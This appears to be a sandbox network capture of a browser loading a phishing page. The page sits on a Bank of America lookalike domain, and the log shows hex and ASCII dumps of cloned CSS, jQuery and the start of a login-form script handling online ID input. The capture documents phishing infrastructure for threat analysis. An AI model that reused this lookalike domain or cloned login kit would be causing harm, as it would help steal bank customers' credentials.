2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 3b 0d 0a 09 09 6c 65 66 74 3a 20 34 70 78 3b 0d 0a 09 09 74 6f 70 3a 20 35 70 78 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 6c 61 62 65 6c 2d 74 78 74 20 7b 0d 0a 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 66 6c 74 72 2d 6f 70 74 20 2e 6f 74 2d 6c 61 62 65 6c 2d 74 78 74 20 7b 0d 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 63 68 6b 62 6f 78 20 69 6e 70 75 74 2c 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 74 67 6c 20 69 6e 70 Data Ascii: sform: rotate(-45deg);left: 4px;top: 5px}#onetrust-pc-sdk .ot-label-txt {display: none}#onetrust-pc-sdk .ot-fltr-opt .ot-label-txt {display: block}#onetrust-pc-sdk .ot-chkbox input,#onetrust-pc-sdk .ot-tgl inp
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 3a 6e 74 68 2d 63 68 69 6c 64 28 6e 2b 33 29 20 70 20 7b 0d 0a 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 76 65 6e 2d 64 65 74 73 20 2e 6f 74 2d 76 65 6e 2d 64 69 73 63 3a 6e 74 68 2d 63 68 69 6c 64 28 6e 2b 33 29 20 70 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 6f 64 64 29 20 7b 0d 0a 09 09 77 69 64 74 68 3a 20 33 30 25 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 76 65 6e 2d 64 65 74 73 20 2e 6f 74 2d 76 65 6e 2d 64 69 73 63 3a 6e 74 68 2d 63 68 69 6c 64 28 6e 2b 33 29 20 70 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 65 76 65 6e 29 20 7b 0d 0a 09 09 77 69 64 74 68 3a 20 35 30 25 3b 0d 0a 09 09 77 Data Ascii: :nth-child(n+3) p {display: inline-block}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc:nth-child(n+3) p:nth-of-type(odd) {width: 30%}#onetrust-pc-sdk .ot-ven-dets .ot-ven-disc:nth-child(n+3) p:nth-of-type(even) {width: 50%;w
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 2e 6f 74 2d 76 6e 64 2d 69 74 65 6d 20 62 75 74 74 6f 6e 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 20 7b 0d 0a 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 76 73 2d 6c 69 73 74 20 2e 6f 74 2d 76 6e 64 2d 69 74 65 6d 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 2e 6f 74 2d 76 6e 64 2d 73 65 72 76 20 2e 6f 74 2d 76 6e 64 2d 69 74 65 6d 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 7b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2e 32 35 72 65 6d 3b 0d 0a 09 09 62 6f 72 64 65 72 2d 74 6f 70 3a 20 75 6e 73 65 74 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 Data Ascii: .ot-vnd-item button[aria-expanded=true] {border-bottom: none}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item:first-child,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item:first-child {margin-top: .25rem;border-top: unset}#onetrust-pc-s
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 0a 09 09 09 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 35 35 70 78 29 3b 0d 0a 09 09 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 0d 0a 09 09 7d 0d 0a 09 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 23 6f 74 2d 61 6e 63 68 6f 72 20 7b 0d 0a 09 09 09 74 6f 70 3a 20 37 35 70 78 3b 0d 0a 09 09 09 72 69 67 68 74 3a 20 33 30 70 78 0d 0a 09 09 7d 0d 0a 09 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 23 6f 74 2d 66 6c 74 72 2d 6d 6f 64 61 6c 20 7b 0d 0a 09 09 09 74 6f 70 3a 20 38 31 70 78 0d 0a 09 09 7d 0d 0a 09 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 23 6f 74 2d 66 6c 74 72 2d 63 6e 74 72 20 7b 0d 0a 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0d 0a 09 09 09 72 69 67 68 74 3a 20 31 35 70 78 0d 0a 09 Data Ascii: width: calc(100% - 55px);position: relative}#onetrust-pc-sdk #ot-anchor {top: 75px;right: 30px}#onetrust-pc-sdk #ot-fltr-modal {top: 81px}#onetrust-pc-sdk #ot-fltr-cntr {float: right;right: 15px
2025-01-15 16:43:41 UTC	1716	IN	Data Raw: 6c 69 63 79 20 74 68 2c 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 64 2c 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 72 20 7b 0d 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 09 09 7d 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 61 62 6c 65 20 2e 6f 74 2d 68 6f 73 74 2c 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 Data Ascii: licy th,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy tr {display: block}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table .ot-host,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy t

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:41 UTC	819	OUT	GET /assets/special/css/loader.css HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:41 UTC	272	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Dec 2022 12:28:14 GMT ETag: "1434-5eff11a7b5380" Accept-Ranges: bytes Content-Length: 5172 Vary: Accept-Encoding Connection: close Content-Type: text/css
2025-01-15 16:43:41 UTC	5172	IN	Data Raw: 0d 0a 0d 0a 2e 6c 6f 61 64 65 72 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 74 6f 70 3a 20 34 34 25 3b 0d 0a 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 0d 0a 2e 6c 6f 61 64 65 72 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 31 31 70 78 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 77 69 64 74 68 3a Data Ascii: .loader { position: fixed; top: 44%; right: 0; bottom: 0; left: 0; z-index: 9999; margin: 0; text-align: center;}.loader:before { content: ""; display: block; margin: 0 auto 11px; text-align: center; width:

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:41 UTC	799	OUT	GET /assets/vipaa-v4-jawr.js HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:41 UTC	291	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 21 Feb 2024 11:42:48 GMT ETag: "2aa8e2-611e2d371de00" Accept-Ranges: bytes Content-Length: 2795746 Vary: Accept-Encoding Connection: close Content-Type: application/javascript
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 20 21 20 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 29 20 7b 0a 20 20 20 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 26 26 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 65 2e 64 6f 63 75 6d 65 6e 74 20 3f 20 74 28 65 2c 20 21 30 29 20 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 20 7b 0a Data Ascii: /! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license / ! function(e, t) { "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) { if (!e.document) {
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 20 3d 20 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 20 21 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 2c 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 20 3d 20 4b 2e 74 65 73 74 28 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 2c 20 64 2e 67 65 74 42 79 49 64 20 3d 20 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: ElementsByTagName = ce(function(e) { return e.appendChild(C.createComment("")), !e.getElementsByTagName("*").length }), d.getElementsByClassName = K.test(C.getElementsByClassName), d.getById = ce(function(e) {
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 73 20 3d 20 66 28 65 2e 72 65 70 6c 61 63 65 28 24 2c 20 22 24 31 22 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 5b 53 5d 20 3f 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 2c 20 6e 2c 20 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 2c 20 6f 20 3d 20 73 28 65 2c 20 6e 75 6c 6c 2c 20 72 2c 20 5b 5d 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 20 3d 20 65 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 61 2d 2d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: s = f(e.replace($, "$1")); return s[S] ? le(function(e, t, n, r) { var i, o = s(e, null, r, []), a = e.length; while (a--) {
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 61 70 65 53 65 6c 65 63 74 6f 72 20 3d 20 64 2e 65 73 63 61 70 65 3b 0a 20 20 20 20 76 61 72 20 68 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 2c 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 20 3d 20 76 6f 69 64 20 30 20 21 3d 3d 20 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 28 65 20 3d 20 65 5b 74 5d 29 20 26 26 20 39 20 21 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 20 26 26 20 53 28 65 29 2e 69 73 28 6e 29 29 20 7b 0a 20 20 20 20 20 Data Ascii: apeSelector = d.escape; var h = function(e, t, n) { var r = [], i = void 0 !== n; while ((e = e[t]) && 9 !== e.nodeType) { if (1 === e.nodeType) { if (i && S(e).is(n)) {
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 61 63 65 28 7a 2c 20 55 29 0a 20 20 20 20 7d 0a 20 20 20 20 76 61 72 20 56 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 39 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 21 2b 65 2e 6e 6f 64 65 54 79 70 65 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 47 28 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 65 78 70 61 6e 64 6f 20 3d 20 53 2e 65 78 70 61 6e 64 6f 20 2b 20 47 2e 75 69 64 2b 2b 0a 20 20 20 20 7d 0a 20 20 20 20 47 2e 75 69 64 20 3d 20 31 2c 20 47 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 63 61 63 68 65 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: ace(z, U) } var V = function(e) { return 1 === e.nodeType \|\| 9 === e.nodeType \|\| !+e.nodeType }; function G() { this.expando = S.expando + G.uid++ } G.uid = 1, G.prototype = { cache: function(e) {
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 75 29 20 26 26 20 59 2e 72 65 6d 6f 76 65 28 65 2c 20 22 68 61 6e 64 6c 65 20 65 76 65 6e 74 73 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 64 69 73 70 61 74 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 2c 20 6e 2c 20 72 2c 20 69 2c 20 6f 2c 20 61 2c 20 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 20 3d 20 53 2e 65 76 65 6e 74 2e Data Ascii: } } S.isEmptyObject(u) && Y.remove(e, "handle events") } }, dispatch: function(e) { var t, n, r, i, o, a, s = new Array(arguments.length), u = S.event.
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 74 79 6c 65 3b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 6e 20 3d 20 6e 20 7c 7c 20 49 65 28 65 29 29 20 26 26 20 28 22 22 20 21 3d 3d 20 28 61 20 3d 20 6e 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 74 29 20 7c 7c 20 6e 5b 74 5d 29 20 7c 7c 20 69 65 28 65 29 20 7c 7c 20 28 61 20 3d 20 53 2e 73 74 79 6c 65 28 65 2c 20 74 29 29 2c 20 21 79 2e 70 69 78 65 6c 42 6f 78 53 74 79 6c 65 73 28 29 20 26 26 20 4d 65 2e 74 65 73 74 28 61 29 20 26 26 20 46 65 2e 74 65 73 74 28 74 29 20 26 26 20 28 72 20 3d 20 73 2e 77 69 64 74 68 2c 20 69 20 3d 20 73 2e 6d 69 6e 57 69 64 74 68 2c 20 6f 20 3d 20 73 2e 6d 61 78 57 69 64 74 68 2c 20 73 2e 6d 69 6e 57 69 64 74 68 20 3d 20 73 2e 6d 61 78 57 69 64 74 68 20 3d 20 73 2e 77 69 64 74 68 20 3d 20 61 2c 20 61 Data Ascii: tyle; return (n = n \|\| Ie(e)) && ("" !== (a = n.getPropertyValue(t) \|\| n[t]) \|\| ie(e) \|\| (a = S.style(e, t)), !y.pixelBoxStyles() && Me.test(a) && Fe.test(t) && (r = s.width, i = s.minWidth, o = s.maxWidth, s.minWidth = s.maxWidth = s.width = a, a
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 20 20 20 64 5b 72 5d 20 3d 20 76 20 26 26 20 76 5b 72 5d 20 7c 7c 20 53 2e 73 74 79 6c 65 28 65 2c 20 72 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 75 20 3d 20 21 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 74 29 29 20 7c 7c 20 21 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 64 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 72 20 69 6e 20 66 20 26 26 20 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 26 26 20 28 6e 2e 6f 76 65 72 66 6c 6f 77 20 3d 20 5b 68 2e 6f 76 65 72 66 6c 6f 77 2c 20 68 2e 6f 76 65 72 66 6c 6f 77 58 2c 20 68 2e 6f 76 65 72 66 6c 6f 77 59 5d 2c 20 6e 75 6c 6c 20 3d 3d 20 28 6c 20 3d 20 Data Ascii: d[r] = v && v[r] \|\| S.style(e, r) } } if ((u = !S.isEmptyObject(t)) \|\| !S.isEmptyObject(d)) { for (r in f && 1 === e.nodeType && (n.overflow = [h.overflow, h.overflowX, h.overflowY], null == (l =
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 2c 20 65 2e 72 65 73 75 6c 74 20 3d 20 76 6f 69 64 20 30 2c 20 65 2e 74 61 72 67 65 74 20 7c 7c 20 28 65 2e 74 61 72 67 65 74 20 3d 20 6e 29 2c 20 74 20 3d 20 6e 75 6c 6c 20 3d 3d 20 74 20 3f 20 5b 65 5d 20 3a 20 53 2e 6d 61 6b 65 41 72 72 61 79 28 74 2c 20 5b 65 5d 29 2c 20 63 20 3d 20 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 5b 64 5d 20 7c 7c 20 7b 7d 2c 20 72 20 7c 7c 20 21 63 2e 74 72 69 67 67 65 72 20 7c 7c 20 21 31 20 21 3d 3d 20 63 2e 74 72 69 67 67 65 72 2e 61 70 70 6c 79 28 6e 2c 20 74 29 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 20 26 26 20 21 63 2e 6e 6f 42 75 62 62 6c 65 20 26 26 20 21 78 28 6e 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 73 20 3d 20 63 2e Data Ascii: , e.result = void 0, e.target \|\| (e.target = n), t = null == t ? [e] : S.makeArray(t, [e]), c = S.event.special[d] \|\| {}, r \|\| !c.trigger \|\| !1 !== c.trigger.apply(n, t))) { if (!r && !c.noBubble && !x(n)) { for (s = c.
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20 Data Ascii: } } } } } } } return {

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:41 UTC	819	OUT	GET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:41 UTC	287	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 21 Feb 2024 13:17:16 GMT ETag: "ce78-611e42548af00" Accept-Ranges: bytes Content-Length: 52856 Vary: Accept-Encoding Connection: close Content-Type: application/javascript
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 24 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 0a 20 20 20 20 20 20 0a 20 20 20 20 69 66 20 28 24 28 27 2e 6f 6e 6c 69 6e 65 2d 69 64 2d 76 69 70 61 61 2d 6d 6f 64 75 6c 65 20 2e 65 6e 74 65 72 2d 73 6b 69 6e 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 43 68 65 63 6b 20 70 6f 6c 69 63 79 20 63 61 6c 6c 0a 20 20 20 20 20 20 20 20 2f 2f 6f 6e 6c 69 6e 65 2d 69 64 2d 73 65 6c 65 63 74 20 66 6f 72 20 73 61 76 65 64 20 6f 69 64 73 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 69 64 73 65 6c 65 63 74 20 3d 20 24 28 27 73 65 6c 65 63 74 23 6f 6e 6c 69 6e 65 2d 69 64 2d 73 65 6c 65 63 74 27 29 3b 0a 20 20 20 20 20 20 20 20 2f 2f 6f 6e 6c 69 6e 65 2d 69 64 2d 69 6e 70 75 74 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 69 64 69 Data Ascii: $(function () { if ($('.online-id-vipaa-module .enter-skin').length > 0) { //Check policy call //online-id-select for saved oids var oidselect = $('select#online-id-select'); //online-id-input var oidi
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 73 73 28 27 64 69 73 70 6c 61 79 4e 6f 6e 65 27 29 3b 0a 09 09 09 09 09 24 28 27 23 73 69 67 6e 69 6e 2d 6d 6f 62 69 6c 65 2d 61 70 70 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 6d 6f 62 69 6c 65 2d 61 70 70 27 29 3b 20 0a 09 09 09 09 09 24 28 27 23 64 69 67 69 74 61 6c 2d 69 64 2d 67 65 6e 65 72 61 6c 2d 65 72 72 6f 72 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24 28 27 23 64 69 67 69 74 61 6c 2d 69 64 2d 73 75 63 63 65 73 73 2d 6d 65 73 73 61 67 65 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24 28 27 23 65 6e 74 65 72 49 44 2d 69 6e 70 75 74 27 29 2e 70 61 72 65 6e 74 28 27 64 69 76 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 